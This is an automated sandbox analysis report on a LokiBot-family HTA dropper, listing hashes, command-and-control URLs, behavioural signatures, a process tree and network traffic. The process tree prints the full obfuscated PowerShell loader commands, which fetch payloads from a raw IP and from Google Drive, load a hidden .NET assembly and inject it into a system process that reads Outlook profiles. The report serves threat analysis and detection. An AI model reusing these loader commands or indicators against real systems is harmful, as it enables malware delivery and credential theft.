Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26-10-2024 02:08
Static task
static1
Behavioral task
behavioral1
Sample
862ce1b2cdc84bf1a2833d131159fb2b890e9bdb60bcbc689a5acd9441b441d5.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
862ce1b2cdc84bf1a2833d131159fb2b890e9bdb60bcbc689a5acd9441b441d5.hta
Resource
win10v2004-20241007-en
General
-
Target
862ce1b2cdc84bf1a2833d131159fb2b890e9bdb60bcbc689a5acd9441b441d5.hta
-
Size
204KB
-
MD5
964a54d784f1cbef1effaa3ab917fcbc
-
SHA1
6d9d2657d1a8277a3427e0819e8260a2ac341e93
-
SHA256
862ce1b2cdc84bf1a2833d131159fb2b890e9bdb60bcbc689a5acd9441b441d5
-
SHA512
c9e0b1cc0597c98f103a84cab21e4fdf4b6d4306db22f3ebd3bccdf08870cf8cb38c7e58047f77f8375059a206294885c4eca91eca8cb14530336620868563cb
-
SSDEEP
96:Eac75EdYJF9OfdYJh9OC/7oRD1gnQbPy9YhrrudYJOdYJEA9OqdYJG7T:EaA5EmFwfmhwYUZ2mOmEAwqm0T
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Extracted
lokibot
http://94.156.177.220/logs/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 4 IoCs
flow pid Process 21 3004 PoweRShELl.EXe 26 1312 powershell.exe 28 1312 powershell.exe 33 1312 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3396 powershell.exe 1312 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2212 powershell.exe 3004 PoweRShELl.EXe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook aspnet_regbrowsers.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook aspnet_regbrowsers.exe Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook aspnet_regbrowsers.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 25 drive.google.com 26 drive.google.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1312 set thread context of 4732 1312 powershell.exe 104 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PoweRShELl.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings PoweRShELl.EXe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3004 PoweRShELl.EXe 3004 PoweRShELl.EXe 2212 powershell.exe 2212 powershell.exe 3396 powershell.exe 3396 powershell.exe 1312 powershell.exe 1312 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3004 PoweRShELl.EXe Token: SeDebugPrivilege 2212 powershell.exe Token: SeDebugPrivilege 3396 powershell.exe Token: SeDebugPrivilege 1312 powershell.exe Token: SeDebugPrivilege 4732 aspnet_regbrowsers.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 4880 wrote to memory of 3004 4880 mshta.exe 85 PID 4880 wrote to memory of 3004 4880 mshta.exe 85 PID 4880 wrote to memory of 3004 4880 mshta.exe 85 PID 3004 wrote to memory of 2212 3004 PoweRShELl.EXe 90 PID 3004 wrote to memory of 2212 3004 PoweRShELl.EXe 90 PID 3004 wrote to memory of 2212 3004 PoweRShELl.EXe 90 PID 3004 wrote to memory of 4056 3004 PoweRShELl.EXe 95 PID 3004 wrote to memory of 4056 3004 PoweRShELl.EXe 95 PID 3004 wrote to memory of 4056 3004 PoweRShELl.EXe 95 PID 4056 wrote to memory of 1256 4056 csc.exe 96 PID 4056 wrote to memory of 1256 4056 csc.exe 96 PID 4056 wrote to memory of 1256 4056 csc.exe 96 PID 3004 wrote to memory of 4672 3004 PoweRShELl.EXe 98 PID 3004 wrote to memory of 4672 3004 PoweRShELl.EXe 98 PID 3004 wrote to memory of 4672 3004 PoweRShELl.EXe 98 PID 4672 wrote to memory of 3396 4672 WScript.exe 99 PID 4672 wrote to memory of 3396 4672 WScript.exe 99 PID 4672 wrote to memory of 3396 4672 WScript.exe 99 PID 3396 wrote to memory of 1312 3396 powershell.exe 101 PID 3396 wrote to memory of 1312 3396 powershell.exe 101 PID 3396 wrote to memory of 1312 3396 powershell.exe 101 PID 1312 wrote to memory of 4732 1312 powershell.exe 104 PID 1312 wrote to memory of 4732 1312 powershell.exe 104 PID 1312 wrote to memory of 4732 1312 powershell.exe 104 PID 1312 wrote to memory of 4732 1312 powershell.exe 104 PID 1312 wrote to memory of 4732 1312 powershell.exe 104 PID 1312 wrote to memory of 4732 1312 powershell.exe 104 PID 1312 wrote to memory of 4732 1312 powershell.exe 104 PID 1312 wrote to memory of 4732 1312 powershell.exe 104 PID 1312 wrote to memory of 4732 1312 powershell.exe 104 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook aspnet_regbrowsers.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook aspnet_regbrowsers.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\862ce1b2cdc84bf1a2833d131159fb2b890e9bdb60bcbc689a5acd9441b441d5.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\SysWOW64\winDowspOWErShell\v1.0\PoweRShELl.EXe"C:\Windows\SySTeM32\winDowspOWErShell\v1.0\PoweRShELl.EXe" "powErshell -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt ; IeX($(iex('[SystEM.TExt.EncoDING]'+[ChAr]0x3A+[char]58+'UTf8.gETSTrIng([SystEm.cOnVeRT]'+[CHar]0x3A+[ChaR]58+'FROMBasE64STRIng('+[cHar]0X22+'JFpibFZsdVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFckRlRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExIayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2FseXlhR21BWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpUkpqdVRGeUZsTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhZIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFPaGJRUSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRaYmxWbHVSdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xNDEvNDIvbG9naXN0aWN0aGluZ3N3aXRoZ29vZHRoaW5nc2dpdmVuYmVzdC50SUYiLCIkRU5WOkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIiwwLDApO3N0QVJ0LXNsZWVwKDMpO3N0QVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIg=='+[Char]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\baac1aba\baac1aba.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6CF.tmp" "c:\Users\Admin\AppData\Local\Temp\baac1aba\CSCD7790140F6794CE1AFC858D1741BC4A9.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:1256
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4672 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdXaDdpbWFnZVVybCA9IHJmSWh0dHBzOi8vZHJpdmUuZ28nKydvZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9JysnMUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHJmSTtXaDd3ZWJDbGknKydlbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1doN2ltYScrJ2dlQnl0ZXMgPSBXaCcrJzcnKyd3ZWJDbGllbnQuRG93bmxvYWREYXRhKFdoN2ltYWdlVXJsKTtXaDdpbScrJ2FnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW4nKydjb2RpbmddOjpVVEY4LkdldFN0JysncmluZyhXaCcrJzdpbWFnZUJ5dGVzKTtXaDdzdGFyJysndEZsYWcgPSByZkk8PEJBU0U2NF9TVEFSVD4+cmZJO1doN2VuZEZsYWcgPSByZkk8PEJBU0U2NCcrJ19FTkQ+PnJmSTtXaDdzdGFydEluZGV4ID0gV2g3aW1hZ2VUZXh0LkluZGV4T2YoV2g3c3RhcnRGbGFnKTtXaDdlbmRJbicrJ2RleCA9IFdoN2ltYScrJ2dlVGV4dC5JbmRleE9mKFdoN2VuZEZsYScrJ2cpO1doN3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBXaDdlbmRJbmRleCAtZ3QgV2g3c3RhcnRJbmQnKydleDtXJysnaDdzdGFydEluZGV4ICs9IFdoN3N0YXJ0RmxhZy5MZW5ndGg7V2g3YmFzZTY0TGVuZ3RoID0gV2g3ZW5kSW5kZXggLSBXaDdzdGFydEluZGV4O1doN2Jhc2U2NENvbW1hbmQgPSBXaDdpbWFnZVRleHQuU3Vic3RyaW5nKFdoN3N0YXJ0SW5kZXgsIFdoN2Jhc2U2NExlbmd0aCknKyc7V2g3YmEnKydzZTY0UicrJ2V2ZXJzZWQgPSAtam9pbiAoV2g3YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJZOSBGb3JFYWNoLU9iamVjdCB7IFdoNycrJ18gfSlbLTEuLi0oV2g3YmFzZTY0Q29tbWFuZC5MZW5ndGgnKycpXTtXaDdjJysnb21tYW5kQnl0ZXMgPSBbU3lzdCcrJ2VtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFdoN2JhJysnc2U2NFJldmVyc2VkKTtXaDdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoV2g3Y29tbWFuJysnZEJ5dGVzJysnKTtXaDd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHJmSVZBSXJmSSk7JysnV2g3dmFpTWV0aG9kLkludm9rZShXaDdudWwnKydsLCBAKHJmSXR4dC5JS0xHT0wvMjQvMTQxLjY3MS4zLicrJzI5MS8vOnB0dGhyZkknKycsIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWFzcG5ldF9yZWdicm93c2Vyc3JmSSwgcmZJZGVzYXRpdmFkb3JmSSwgcmZJZGVzYXRpdmFkb3JmSSxyZklkJysnZXNhdGl2YWRvJysncmZJLHJmJysnSWRlc2F0aXZhJysnZG9yZkkscmZJZGVzYXRpdmFkb3JmSSxyZklkZXNhdGl2YWQnKydvcmZJLHJmSWRlc2F0aXZhZCcrJ29yZkkscmZJMXJmSSxyZklkZXNhdGl2YWRvcmZJKSk7JykuUkVQTEFjRSgoW0NIYXJdODcrW0NIYXJdMTA0K1tDSGFyXTU1KSwnJCcpLlJFUExBY0UoJ3JmSScsW3N0cmluR11bQ0hhcl0zOSkuUkVQTEFjRSgoW0NIYXJdODIrW0NIYXJdODkrW0NIYXJdNTcpLFtzdHJpbkddW0NIYXJdMTI0KSB8LiAoICRWRXJCb1NFUHJlZkVyZU5DZS5Ub3NUUmluZygpWzEsM10rJ1gnLWpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Wh7imageUrl = rfIhttps://drive.go'+'ogle.com/uc?export=download&id='+'1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur rfI;Wh7webCli'+'ent = New-Object System.Net.WebClient;Wh7ima'+'geBytes = Wh'+'7'+'webClient.DownloadData(Wh7imageUrl);Wh7im'+'ageText = [System.Tex'+'t.En'+'coding]::UTF8.GetSt'+'ring(Wh'+'7imageBytes);Wh7star'+'tFlag = rfI<<BASE64_START>>rfI;Wh7endFlag = rfI<<BASE64'+'_END>>rfI;Wh7startIndex = Wh7imageText.IndexOf(Wh7startFlag);Wh7endIn'+'dex = Wh7ima'+'geText.IndexOf(Wh7endFla'+'g);Wh7startIndex -ge 0 -and Wh7endIndex -gt Wh7startInd'+'ex;W'+'h7startIndex += Wh7startFlag.Length;Wh7base64Length = Wh7endIndex - Wh7startIndex;Wh7base64Command = Wh7imageText.Substring(Wh7startIndex, Wh7base64Length)'+';Wh7ba'+'se64R'+'eversed = -join (Wh7base64Command.ToCharArray() RY9 ForEach-Object { Wh7'+'_ })[-1..-(Wh7base64Command.Length'+')];Wh7c'+'ommandBytes = [Syst'+'em.Convert]::FromBase64String(Wh7ba'+'se64Reversed);Wh7loadedAssembly = [System.Reflection.Assembly]::Load(Wh7comman'+'dBytes'+');Wh7vaiMethod = [dnlib.IO.Home].GetMethod(rfIVAIrfI);'+'Wh7vaiMethod.Invoke(Wh7nul'+'l, @(rfItxt.IKLGOL/24/141.671.3.'+'291//:ptthrfI'+', rfIdesativadorfI, rfIdesativadorfI, rfIdesativadorfI, rfIaspnet_regbrowsersrfI, rfIdesativadorfI, rfIdesativadorfI,rfId'+'esativado'+'rfI,rf'+'Idesativa'+'dorfI,rfIdesativadorfI,rfIdesativad'+'orfI,rfIdesativad'+'orfI,rfI1rfI,rfIdesativadorfI));').REPLAcE(([CHar]87+[CHar]104+[CHar]55),'$').REPLAcE('rfI',[strinG][CHar]39).REPLAcE(([CHar]82+[CHar]89+[CHar]57),[strinG][CHar]124) |. ( $VErBoSEPrefEreNCe.TosTRing()[1,3]+'X'-joIn'')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"6⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4732
-
-
-
-
-
Network
-
Remote address:8.8.8.8:53Request196.249.167.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request74.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.ax-0001.ax-msedge.netg-bing-com.ax-0001.ax-msedge.netIN CNAMEax-0001.ax-msedge.netax-0001.ax-msedge.netIN A150.171.28.10ax-0001.ax-msedge.netIN A150.171.27.10
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=Remote address:150.171.28.10:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=07B7CE54DF7368751036DB70DEEC69F4; domain=.bing.com; expires=Thu, 20-Nov-2025 02:08:19 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 077F5FD82A244F5D882E3F1E16706C0A Ref B: LON601060104031 Ref C: 2024-10-26T02:08:19Z
date: Sat, 26 Oct 2024 02:08:19 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=Remote address:150.171.28.10:443RequestGET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=07B7CE54DF7368751036DB70DEEC69F4
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=pMu2NgIsmEDHAPLRqEh5zQTdmB8-mg_F2mK9lQwsRiM; domain=.bing.com; expires=Thu, 20-Nov-2025 02:08:19 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D86DD89D643D456583A99850086A19B8 Ref B: LON601060104031 Ref C: 2024-10-26T02:08:19Z
date: Sat, 26 Oct 2024 02:08:19 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=Remote address:150.171.28.10:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=07B7CE54DF7368751036DB70DEEC69F4; MSPTC=pMu2NgIsmEDHAPLRqEh5zQTdmB8-mg_F2mK9lQwsRiM
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F0110680EA9C49B695157E2530220450 Ref B: LON601060104031 Ref C: 2024-10-26T02:08:19Z
date: Sat, 26 Oct 2024 02:08:19 GMT
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request43.58.199.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request10.28.171.150.in-addr.arpaIN PTRResponse
-
Remote address:192.3.176.141:80RequestGET /42/logisticthingswithgoodthingsgivenbest.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 192.3.176.141
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Fri, 25 Oct 2024 04:05:40 GMT
ETag: "222be-625453b768b38"
Accept-Ranges: bytes
Content-Length: 139966
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
-
Remote address:8.8.8.8:53Request141.176.3.192.in-addr.arpaIN PTRResponse141.176.3.192.in-addr.arpaIN PTR192-3-176-141-hostcolocrossingcom
-
Remote address:8.8.8.8:53Requestdrive.google.comIN AResponsedrive.google.comIN A142.250.179.238
-
Remote address:142.250.179.238:443RequestGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
Host: drive.google.com
Connection: Keep-Alive
ResponseHTTP/1.1 303 See Other
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 26 Oct 2024 02:08:27 GMT
Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
Strict-Transport-Security: max-age=31536000
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: script-src 'report-sample' 'nonce-wD8baXeO8aMYOVGT5rf0tA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Requestdrive.usercontent.google.comIN AResponsedrive.usercontent.google.comIN A142.250.187.193
-
GEThttps://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=downloadpowershell.exeRemote address:142.250.187.193:443RequestGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
Host: drive.usercontent.google.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="new_image-new.jpg"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, 